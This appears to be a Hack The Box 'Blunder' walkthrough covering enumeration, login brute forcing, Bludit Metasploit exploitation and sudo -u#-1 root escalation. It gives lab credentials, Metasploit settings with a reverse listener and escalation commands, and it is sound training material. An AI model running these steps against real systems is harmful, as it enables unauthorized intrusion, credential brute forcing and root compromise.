HTB — Blunder Walkthrough

Exploitation using metasploit.

Image for post
Image for post

Information Gathering and Enumeration:

#NMAP Scan:
sudo nmap -A -T4 10.10.10.191 -oN nmap_blunder
-A =
Enable OS detection, version detection, script scanning, and traceroute.
-T4 = Set timing template (higher is faster).
-oN =output to file as Normal.
nmap_blunder = output file.

Image for post
Image for post
There is only one port open which is the TCP port 80.
Image for post
Image for post
Browse the web page for more information. One hint is that one of the words here is the password for the website.
Image for post
Image for post
Information from the Wappalyzer.

#Directory busting using gobuster:
gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt -x txt,php 2>/dev/null
dir =
Uses directory/file brute-forcing mode.
-u = host to be scanned.
-w = wordlist directory.
-x = files to look for.
2>/dev/null = redirects errors to null directory to reduce unwanted outputs.

Image for post
Image for post
Image for post
Image for post

#Visit interesting directories like /admin, /robots.txt, /todo.txt:

/admin:

Image for post
Image for post
Bludit is an interesting information. Bludit is a CMS(Content Management System)

/robots.txt:

Image for post
Image for post
No useful information here!
Image for post
Image for post
Here we have information that this is indeed a CMS, the FTP is turned off which is also shown in the NMAP scan, Old users are removed, and we have a user name “fergus”.

#Intercept login traffic using BurpSuite:

Image for post
Image for post
Install Foxy Proxy or enable proxy manually from your browser.
Image for post
Image for post
Once traffic is intercepted from the Proxy, right click then hit “Send to Repeater”.
Image for post
Image for post
The website is using CSRF token so hydra http-post brute force iss unlikely to work. Luckily we have available python script.

A CSRF token is a unique, secret, unpredictable value that is generated by the server-side application and transmitted to the client in such a way that it is included in a subsequent HTTP request made by the client.

Exploitation:

#Python script for brute forcing CSRF Token:

Image for post
Image for post
So far we have set the username as “fergus” but we still need a wordlist for the password.

#Generating password wordlist from the webpage using CEWL:

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

cewl -w wordlist.txt -d 10 -m 7 http://10.10.10.191
-w =
Write the output to the file.
- d = Depth to spider to, default 2
-m = Minimum word length, default 3.

Image for post
Image for post
There are 142 words that have atleast 7 words in them gathered from the web page. This is done instead of a typical word lists since one of the hint says that one of the words on the web page is the actual password.

#Brute forcing the login page http://10.10.10.191/admin/login

Run python script.
./bruteforce.py

Image for post
Image for post
Start python script for brute forcing.
Image for post
Image for post
Successfully brute forced the login.

#Login to the Web page using the credentials gathered.

Username: fergus
Password: RolandDeschain

Image for post
Image for post
Image for post
Image for post
Successfully logged in using the credentials gathered.

#Check for existing exploits for Bludit:

Search for existing exploits in kali repositories
searchsploit bludit

Image for post
Image for post
There is an existing metasploit exploit module.

Search exploit in metasploit
msfconsole -q
search bludit type:exploit

Image for post
Image for post

Gather information about the exploit
info exploit/linux/http/bludit_upload_images_exec

Image for post
Image for post
Image for post
Image for post
The required field will have to be filled in.

#Use exploit module and configure options:

use exploit/linux/http/bludit_upload_images_exec
set rhosts 10.10.10.191
set lhost tun0
set BLUDITUSER fergus
set BLUDITPASS RolandDeschain
exploit

Image for post
Image for post

Post exploitation and privilege escalation:

#Go to shell and improve it using python:
shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’

Image for post
Image for post

#Look for the user and root flag:

user.txt
root.txt

Image for post
Image for post
Unable to read user.txt so privilege must be escalated.

#Look for credentials for the users hugo or shaun:

Look for SSH username/password:

Image for post
Image for post
Unable to read .ssh file.

#Let’s cheat for a bit and locate users.php

Image for post
Image for post
We got the password but it is hashed.

#Crack the password hash using online hash cracking sites:

Image for post
Image for post
Plaintext is Password120.

#Switch user from www-data to hugo:

su hugo

Image for post
Image for post

Check privilege using sudo -l command.

Image for post
Image for post

#Locate and Read flags:

Under /home/hugo/
cat user.txt

Image for post
Image for post

cd /root/
cat root.txt

Image for post
Image for post
Privilege escalation is still needed for root.

#Escalate privilege to access root flag:

sudo -l = list user’s privileges or check a specific command.
sudo -u#-1 /bin/bash
-u =
run command (or edit file) as specified user name or ID.
#-1 = a bug/exploit that allows to execute command as root.

Image for post
Image for post
Successfully gained access as root..

Experienced Network Security Engineer with a demonstrated history of working in the field of IT security industry.

Get the Medium app